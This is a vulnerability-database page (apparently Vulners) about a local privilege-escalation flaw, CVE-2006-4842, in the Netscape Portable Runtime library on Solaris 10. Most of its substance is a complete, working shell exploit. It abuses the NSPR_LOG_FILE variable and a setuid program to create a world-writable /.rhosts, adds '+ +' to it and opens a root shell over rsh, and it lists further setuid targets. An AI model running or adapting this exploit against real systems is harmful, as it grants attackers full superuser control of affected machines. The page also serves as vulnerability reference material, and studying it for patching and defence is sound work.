Vulners
Lucene search
Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation Vulnerability (1)
| Reporter | Title | Published | Views | Family All 51 |
|---|---|---|---|---|
 | Solaris libnspr NSPR_LOG_FILE Privilege Escalation Exploit | 18 Sep 201800:00 | – | zdt |
| Solaris 10 (libnspr) Arbitrary File Creation Local Root Exploit | 13 Oct 200600:00 | – | zdt |
| Solaris 10 libnspr LD_PRELOAD Arbitrary File Creation Local Root Exploit | 16 Oct 200600:00 | – | zdt |
| Solaris 10 libnspr constructor Local Root Exploit | 24 Oct 200600:00 | – | zdt |
 | CVE-2006-4842 | 17 Sep 201822:21 | – | circl |
 | CVE-2006-4842 | 12 Oct 200600:00 | – | cve |
 | CVE-2006-4842 | 12 Oct 200600:00 | – | cvelist |
 | Immunity Canvas: CVE_2006_4842 | 12 Oct 200600:07 | – | canvas |
 | Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1) | 13 Oct 200600:00 | – | exploitdb |
| Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2) | 16 Oct 200600:00 | – | exploitdb |
10
source: http://www.securityfocus.com/bid/20471/info
The Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.
A successful exploit of this issue allows an attacker to gain superuser privileges, completely compromising the affected computer.
Version 4.6.1 running on Sun Solaris 10 is vulnerable to this issue.
#!/bin/sh
#
# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $
#
# raptor_libnspr - Solaris 10 libnspr oldschool local root
# Copyright (c) 2006 Marco Ivaldi <[email protected]>
#
# Local exploitation of a design error vulnerability in version 4.6.1 of
# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to
# create or overwrite arbitrary files on the system. The problem exists
# because environment variables are used to create log files. Even when the
# program is setuid, users can specify a log file that will be created with
# elevated privileges (CVE-2006-4842).
#
# Usage:
# $ chmod +x raptor_libnspr
# $ ./raptor_libnspr
# [...]
# # id
# uid=0(root) gid=0(root)
# #
#
# Vulnerable platforms (SPARC):
# Solaris 10 without patch 119213-10 [tested]
#
# Vulnerable platforms (x86):
# Solaris 10 without patch 119214-10 [untested]
#
echo "raptor_libnspr - Solaris 10 libnspr oldschool local root"
echo "Copyright (c) 2006 Marco Ivaldi <[email protected]>"
echo
# prepare the environment
NSPR_LOG_MODULES=all:5
NSPR_LOG_FILE=/.rhosts
export NSPR_LOG_MODULES NSPR_LOG_FILE
# gimme rw-rw-rw!
umask 0
# setuid program linked to /usr/lib/mps/libnspr4.so
/usr/bin/chkey
# other good setuid targets
#/usr/bin/passwd
#/usr/bin/lp
#/usr/bin/cancel
#/usr/bin/lpset
#/usr/bin/lpstat
#/usr/lib/lp/bin/netpr
#/usr/lib/sendmail
#/usr/sbin/lpmove
#/usr/bin/login
#/usr/bin/su
#/usr/bin/mailq
# oldschool rhosts foo;)
echo "+ +" > $NSPR_LOG_FILE
rsh -l root localhost sh -i
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.07683